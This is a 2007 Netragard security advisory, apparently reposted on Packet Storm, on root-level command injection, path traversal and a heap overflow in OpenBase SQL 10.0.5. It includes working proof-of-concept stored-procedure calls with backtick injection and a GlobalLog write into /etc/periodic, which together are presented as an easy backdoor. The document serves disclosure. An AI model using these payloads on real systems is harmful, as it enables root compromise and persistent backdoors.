exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Netragard Security Advisory 2007-03-13

Netragard Security Advisory 2007-03-13
Posted Nov 6, 2007
Authored by Kevin Finisterre, Adriel T. Desautels, Netragard | Site netragard.com

Netragard, L.L.C Advisory - Netragard's SNOsoft Research Team discovered two critical vulnerabilities in the OpenBase SQL Relational Database that can lead to full system compromise. OpenBase versions 10.0.5 and below are affected.

tags | advisory, vulnerability
SHA-256 | 461394d46dce182dddd5cd5ac8284bec3acbe0ca019c1b7a15477e4a510c19e6

Netragard Security Advisory 2007-03-13

Change Mirror Download
Hash: SHA1

********************** Netragard, L.L.C Advisory**********************
Penetration Testing, Vulnerability Assessments, Web Application Security

Strategic Reconnaissance Team
http://www.netragard.com -- "We make I.T. Safe."

- --------------------------------------------------------------------------
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated. The advisory can be found on the
Netragard website at http://www.netragard.com/

For more information about Netragard visit http://www.netragard.com

[Advisory Information]
- --------------------------------------------------------------------------
Contact : Adriel T. Desautels
Researcher : Kevin Finisterre
Advisory ID : NETRAGARD-20070313
Product Name : OpenBase SQL Relational Database
Product Version : <= OpenBase 10.0.5 (All Platforms)
Vendor Name : OpenBase International, Ltd.
Type of Vulnerability : Remote Buffer Overflow, Command injection
Effort : Easy

[Product Description]
- --------------------------------------------------------------------------
"For over a decade, the OpenBase family of products have been enabling
some of the most innovative business applications at work today. With
thousands of customers worldwide, OpenBase has become a brand that
companies can rely on.

OpenBase customers include AT&T, Adobe Systems, Canon, Walt Disney,
First National Bank of Chicago, MCI, Motorola, Apple, The Sharper Image
and many other innovators worldwide."

- -- http://openbase.com/home-Aboutus.html --

[Technical Summary]
- --------------------------------------------------------------------------
Netragard's SNOsoft Research Team discovered two critical
vulnerabilities in the OpenBase SQL Relational Database that can lead to
full system compromise.

The first vulnerability discovered is a command injection vulnerability
that affects several of the default Stored Procedures. Specifically,
it is possible to execute system commands as the root user by inserting
a series of backticks into the pre-defined Stored Procedures.

The second vulnerability discovered in Buffer Overflow that causes heap
corruption. This also has the potential to lead to the execution of
arbitrary code or a Denial of Service condition.

[Technical Details]
- --------------------------------------------------------------------------
1. call AsciiBackup('\`id\`')
results in commands being run as root.

desktop:/tmp kfinisterre$ tail -f /tmp/isql_messages

OpenBase ISQL version 8.0 for MacOS X
Copyright (c) 1993-2003 OpenBase International. Ltd.
All Rights Reserved.

Using database 'WOMovies' on host 'localhost'

Could not write file:uid=0(root) gid=0(wheel) groups=0(wheel)/WOMovies.bck

2. call GlobalLog("../../../path/to/file", "\n user input goes here \n")
results in root owned files being created. Combine with above for an
easy backdoor.

openbase 1> call GlobalLog("../../../../../../etc/periodic/daily/600"
, "\n/usr/bin/id > /tmp/file\n")
openbase 2> go
Data returned... calculating column widths

- ----------
- ----------
1 rows returned - 0.039 seconds (printed in 0.039 seconds)
openbase 1> call AsciiBackup('`chmod +x /etc/periodic/daily/600.msg;
/usr/sbin/periodic daily`')
openbase 2> go
Data returned... calculating column widths

- ----------
- ----------
1 rows returned - 1.825 seconds (printed in 1.826 seconds)
openbase 1>

3. select aaaaaaaaaaaaaaaaaaaa... from aaaaaaaaaaaaaaaaaaa...
results in zone_free() issues referencing 0x61616161

4. call OEMLicenseInstall("`/usr/bin/id>/tmp/aaax`","`/usr/bin/id>/tmp/bbbx
results in commands being run as root

An exploitable vulnerability exists in OpenBase in the creation of
Stored Procedures that can be used to gain NT AUTHORITY\SYSTEM or root
level privileges. Specifically, a user can create a stored procedure
with an unusually long name which will and trigger a buffer overflow
condition that will result in heap corruption. If done properly, an
attacker may be able to execute arbitrary commands against the affected

[Proof Of Concept]
- --------------------------------------------------------------------------
See Above

[Vendor Status]
- --------------------------------------------------------------------------
Vendor Notified on 03/05/07
Vendor Patched on 03/09/07
Vendor quote:

"OpenBase now runs as the 'openbase' user for security reasons. I would
like to publically thank Kevin Finisterre for his input."

- ------------------------http://www.netragard.com--------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit

<a href="http://www.netragard.com>

Version: GnuPG v1.4.5 (Darwin)


Login or Register to add favorites

File Archive:

September 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    2 Files
  • 2
    Sep 2nd
    21 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    17 Files
  • 5
    Sep 5th
    34 Files
  • 6
    Sep 6th
    29 Files
  • 7
    Sep 7th
    11 Files
  • 8
    Sep 8th
    25 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    26 Files
  • 12
    Sep 12th
    23 Files
  • 13
    Sep 13th
    17 Files
  • 14
    Sep 14th
    22 Files
  • 15
    Sep 15th
    16 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    19 Files
  • 19
    Sep 19th
    60 Files
  • 20
    Sep 20th
    23 Files
  • 21
    Sep 21st
    15 Files
  • 22
    Sep 22nd
    8 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    17 Files
  • 26
    Sep 26th
    3 Files
  • 27
    Sep 27th
    13 Files
  • 28
    Sep 28th
    5 Files
  • 29
    Sep 29th
    12 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By